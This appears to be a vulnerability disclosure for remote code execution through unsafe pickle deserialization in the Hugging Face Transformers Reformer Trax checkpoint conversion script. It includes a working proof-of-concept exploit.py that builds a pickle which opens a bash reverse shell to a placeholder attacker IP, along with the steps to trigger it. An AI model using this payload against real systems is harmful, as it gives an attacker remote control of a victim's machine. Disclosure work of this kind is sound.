Hugging Face Transformers Trax Model Deserialization of Untrusted Data Remote Code Execution Vulnerability
High-level overview and effects of the vulnerability:
The vulnerability allows an attacker to execute arbitrary code on the host machine by supplying a malicious reformer trax
checkpoint file to the convert_reformer_trax_checkpoint_to_pytorch.py
script in the Hugging Face Transformers repository.
If an unsuspecting user uses a third-party reformer trax
checkpoint file, executing the convert_reformer_trax_checkpoint_to_pytorch.py
script will lead to remote code execution (RCE) on the victim's system.
The Vulnerable Product
- Product: Hugging Face Transformers
- Module: Reformer
- File: transformers/src/transformers/models/reformer/convert_reformer_trax_checkpoint_to_pytorch.py
- Version: Latest
- GitHub Permalink: https://github.com/huggingface/transformers/blob/c8c8dffbe45ebef0a8dba4a51024e5e5e498596b/src/transformers/models/reformer/convert_reformer_trax_checkpoint_to_pytorch.py
Root Cause Analysis
-
Detailed description of the vulnerability: The vulnerability results from unsafe deserialization of untrusted data. The script uses
pickle.load
to load the checkpoint file and is vulnerable to code execution. -
Code flow from input to the vulnerable condition:
- The user downloads a third-party
reformer trax
model. - The user runs the
convert_reformer_trax_checkpoint_to_pytorch.py
script and passes the checkpoint file to it. - The
convert_reformer_trax_checkpoint_to_pytorch.py
script deserializes the checkpoint file and executes the malicious code.
-
Injection point: The vulnerability occurs at the point where
pickle.load
is called.
GitHub Permalink: https://github.com/huggingface/transformers/blob/c8c8dffbe45ebef0a8dba4a51024e5e5e498596b/src/transformers/models/reformer/convert_reformer_trax_checkpoint_to_pytorch.py#L192 -
Suggested fixes: Replace
pickle.load
withyaml.safe_load(yaml_file)
orjson.load
to prevent the execution of arbitrary code. -
Instructions executing the proof-of-concept:
- Run
exploit.py
to create a malicious pickle filemalicious.pkl
that will create a reverse shell on the victim’s system:
# exploit.py
import pickle
import os
class Exploit:
def __reduce__(self):
return (os.system, ('bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1',))
malicious_data = pickle.dumps(Exploit())
with open('malicious.pkl', 'wb') as f:
f.write(malicious_data)
print("Malicious pickle file created successfully.")
Note: Change the ATTACKER_IP and ATTACKER_PORT before sending the file to the victim.
- Create a
config.json
configuration file:
{
"attention_head_size": 64,
"attention_probs_dropout_prob": 0.1,
"attn_layers": [
"local",
"lsh",
"local",
"lsh",
"local",
"lsh"
],
"axial_norm_std": 1.0,
"axial_pos_embds": true,
"axial_pos_embds_dim": [
64,
960
],
"axial_pos_shape": [
64,
64
],
"chunk_size_lm_head": 0,
"classifier_dropout": null,
"eos_token_id": 2,
"feed_forward_size": 512,
"hash_seed": null,
"hidden_act": "relu",
"hidden_dropout_prob": 0.1,
"hidden_size": 1024,
"initializer_range": 0.02,
"is_decoder": true,
"layer_norm_eps": 1e-12,
"local_attention_probs_dropout_prob": 0.05,
"local_attn_chunk_length": 64,
"local_num_chunks_after": 0,
"local_num_chunks_before": 1,
"lsh_attention_probs_dropout_prob": 0.0,
"lsh_attn_chunk_length": 64,
"lsh_num_chunks_after": 0,
"lsh_num_chunks_before": 1,
"max_position_embeddings": 4096,
"model_type": "reformer",
"num_attention_heads": 16,
"num_buckets": null,
"num_hashes": 1,
"num_hidden_layers": 6,
"pad_token_id": 0,
"tie_word_embeddings": false,
"transformers_version": "4.42.4",
"type_vocab_size": 2,
"use_cache": true,
"vocab_size": 30522
}
- Run the
convert_reformer_trax_checkpoint_to_pytorch.py
script and pass themalicious.pkl
file to--trax_model_pkl_path
:
> python convert_reformer_trax_checkpoint_to_pytorch.py --trax_model_pkl_path malicious.pkl --config_file config.json --pytorch_dump_path .
Note: The
pytorch_dump_folder_path
can be set as any directory.
Software Download Link:
https://github.com/huggingface/transformers/tree/main